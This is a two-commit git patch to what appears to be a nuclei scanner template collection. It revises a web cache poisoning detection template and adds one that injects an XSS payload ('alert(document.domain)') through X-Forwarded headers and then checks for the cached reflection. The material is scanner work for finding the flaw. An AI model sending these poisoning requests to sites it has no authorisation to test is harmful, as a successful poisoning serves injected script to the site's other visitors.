From 384dbd196915ed9aff17f57f16d6b9f2cd43ce9d Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Mon, 17 Apr 2023 14:58:43 +0530
Subject: [PATCH 1/2] misc update to cache-poisoning

---
 vulnerabilities/generic/cache-poisoning.yaml | 15 ++++++++-------
 1 file changed, 8 insertions(+), 7 deletions(-)

diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml
index 88f4e1af9f..60371db9a2 100644
--- a/vulnerabilities/generic/cache-poisoning.yaml
+++ b/vulnerabilities/generic/cache-poisoning.yaml
@@ -1,7 +1,7 @@
 id: cache-poisoning
 
 info:
-  name: Cache Poisoning
+  name: Cache Poisoning Detection
   author: melbadry9,xelkomy,akincibor,dogasantos
   severity: low
   reference:
@@ -13,21 +13,22 @@ requests:
   - raw:
       - |
         GET /?{{randstr}}=9 HTTP/1.1
-        X-Forwarded-Prefix: prefix.cache.interact.sh
-        X-Forwarded-Host: host.cache.interact.sh
-        X-Forwarded-For: for.cache.interact.sh
+        Host: {{Hostname}}
+        X-Forwarded-Prefix: prefix.cache.oast.pro
+        X-Forwarded-Host: host.cache.oast.pro
+        X-Forwarded-For: for.cache.oast.pro
 
       - |
         GET /?{{randstr}}=9 HTTP/1.1
+        Host: {{Hostname}}
 
-    req-condition: true
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body_2, "cache.interact.sh")'
+          - 'contains(body_2, "cache.oast.pro")'
 
     extractors:
       - type: regex
         part: response
         regex:
-          - "(prefix|host|for).cache.interact.sh"
+          - "(prefix|host|for).cache.oast.pro"

From 851ce260339fad3615023ac192b645333278184b Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Mon, 17 Apr 2023 15:37:36 +0530
Subject: [PATCH 2/2] misc updates

---
 .../generic/cache-poisoning-xss.yaml          | 36 +++++++++++++++++++
 vulnerabilities/generic/cache-poisoning.yaml  | 23 ++++++------
 2 files changed, 47 insertions(+), 12 deletions(-)
 create mode 100644 vulnerabilities/generic/cache-poisoning-xss.yaml

diff --git a/vulnerabilities/generic/cache-poisoning-xss.yaml b/vulnerabilities/generic/cache-poisoning-xss.yaml
new file mode 100644
index 0000000000..518c079941
--- /dev/null
+++ b/vulnerabilities/generic/cache-poisoning-xss.yaml
@@ -0,0 +1,36 @@
+id: cache-poisoning-xss
+
+info:
+  name: Cache Poisoning - Stored XSS
+  author: melbadry9,xelkomy,akincibor
+  severity: high
+  reference:
+    - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
+    - https://portswigger.net/research/practical-web-cache-poisoning
+    - https://portswigger.net/web-security/web-cache-poisoning
+  tags: cache,generic,xss
+
+variables:
+  cache_key: "{{to_lower(rand_base(6))}}"
+  cache_header: "{{to_lower(rand_base(6))}}"
+  xss_payload: '"></script><script>alert(document.domain);</script>'
+
+requests:
+  - raw:
+      - |
+        GET /?{{cache_key}}=1 HTTP/1.1
+        Host: {{Hostname}}
+        X-Forwarded-Prefix: {{cache_header}}.xfp{{xss_payload}}
+        X-Forwarded-Host: {{cache_header}}.xfh{{xss_payload}}
+        X-Forwarded-For: {{cache_header}}.xff{{xss_payload}}
+
+      - |
+        GET /?{{cache_key}}=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body_2, cache_header)
+          - contains(body_2, xss_payload)
+        condition: and
\ No newline at end of file
diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml
index 60371db9a2..168841fb7c 100644
--- a/vulnerabilities/generic/cache-poisoning.yaml
+++ b/vulnerabilities/generic/cache-poisoning.yaml
@@ -7,28 +7,27 @@ info:
   reference:
     - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
     - https://portswigger.net/research/practical-web-cache-poisoning
+    - https://portswigger.net/web-security/web-cache-poisoning
   tags: cache,generic
 
+variables:
+  cache_key: "{{to_lower(rand_base(6))}}"
+  cache_header: "{{to_lower(rand_base(6))}}"
+
 requests:
   - raw:
       - |
-        GET /?{{randstr}}=9 HTTP/1.1
+        GET /?{{cache_key}}=9 HTTP/1.1
         Host: {{Hostname}}
-        X-Forwarded-Prefix: prefix.cache.oast.pro
-        X-Forwarded-Host: host.cache.oast.pro
-        X-Forwarded-For: for.cache.oast.pro
+        X-Forwarded-Prefix: {{cache_header}}.xfp
+        X-Forwarded-Host: {{cache_header}}.xfh
+        X-Forwarded-For: {{cache_header}}.xff
 
       - |
-        GET /?{{randstr}}=9 HTTP/1.1
+        GET /?{{cache_key}}=9 HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body_2, "cache.oast.pro")'
-
-    extractors:
-      - type: regex
-        part: response
-        regex:
-          - "(prefix|host|for).cache.oast.pro"
+          - 'contains(body_2, cache_header)'
\ No newline at end of file